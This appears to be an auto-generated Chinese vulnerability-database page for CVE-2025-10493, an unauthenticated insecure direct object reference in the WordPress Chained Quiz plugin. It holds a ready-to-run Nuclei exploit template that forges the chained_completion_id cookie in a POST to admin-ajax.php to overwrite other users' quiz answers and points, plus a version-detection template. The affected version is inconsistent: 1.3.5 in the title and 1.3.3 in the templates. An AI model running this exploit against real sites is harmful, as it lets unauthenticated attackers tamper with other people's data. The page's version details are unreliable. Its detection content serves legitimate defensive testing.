[webapps] Chained Quiz 1.3.5 - Unauthenticated Insecure Direct Object Reference via Cookie
CVE-2025-10493
漏洞
High · CVSS N/A📋 漏洞基础信息
| CVE | CVE-2025-10493 |
|---|---|
| 漏洞类型 | 漏洞 |
| 受影响版本 | 详见原文 |
| 危害等级 | High · CVSS N/A |
| 发布日期 | 2025-12-25 |
| 提交者 | Karuppiah Sabari Kumar(0xsabre) |
| 来源 | Exploit-DB 原文 ↗ |
⚔️ Nuclei Exploit 模板
以下为标准 Nuclei v3 格式的利用模板,可直接用于漏洞验证:
id: CVE-2025-10493-exploit
info:
name: Chained Quiz <= 1.3.3 - Unauthenticated IDOR Exploit
author: 0xsabre
severity: high
description: |
Exploits an Insecure Direct Object Reference vulnerability in the Chained
Quiz plugin by manipulating the chained_completion_id cookie to tamper with
other users' quiz submissions.
reference:
- https://www.exploit-db.com/exploits/52048
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-10493
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
cvss-score: 7.5
cwe-id: CWE-639
tags: wordpress,wp-plugin,idor,auth-bypass,chained-quiz
variables:
victim_completion_id: "2"
quiz_id: "1"
question_id: "1"
post_id: "117"
total_questions: "1"
malicious_answer: "0"
malicious_points: "0"
http:
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Cookie: chained_completion_id{{quiz_id}}={{victim_completion_id}}
Content-Type: application/x-www-form-urlencoded
answer={{malicious_answer}}&question_id={{question_id}}&quiz_id={{quiz_id}}&post_id={{post_id}}&question_type=radio&points={{malicious_points}}&action=chainedquiz_ajax&chainedquiz_action=answer&total_questions={{total_questions}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- "success"
- "completed"
condition: or
- type: status
status:
- 200🔍 Nuclei Detection 模板
以下为漏洞探测模板,用于判断目标是否受影响:
id: CVE-2025-10493-detection
info:
name: Chained Quiz <= 1.3.3 - Unauthenticated IDOR Detection
author: 0xsabre
severity: high
description: |
Chained Quiz plugin for WordPress is vulnerable to Insecure Direct Object
Reference via a client-side cookie. This allows unauthenticated attackers
to manipulate quiz submissions belonging to other users.
reference:
- https://www.exploit-db.com/exploits/52048
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-10493
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
cvss-score: 7.5
cwe-id: CWE-639
tags: wordpress,wp-plugin,idor,auth-bypass,chained-quiz
variables:
quiz_id: "1"
http:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/chained-quiz/readme.txt"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Chained Quiz"
- "Stable tag:"
condition: and
- type: regex
part: body
regex:
- 'Stable tag: (0(\.\d+){0,2}|1(\.([0-2]|3\.[0-3]))?|0\.\d+)'
- type: status
status:
- 200🛡️ 修复建议
请升级到厂商最新安全版本。
📎 参考链接
⚠️ 本文基于公开漏洞数据库,仅供安全研究与防御参考。生成时间: 2026-05-07 06:14 | 来源: Exploit-DB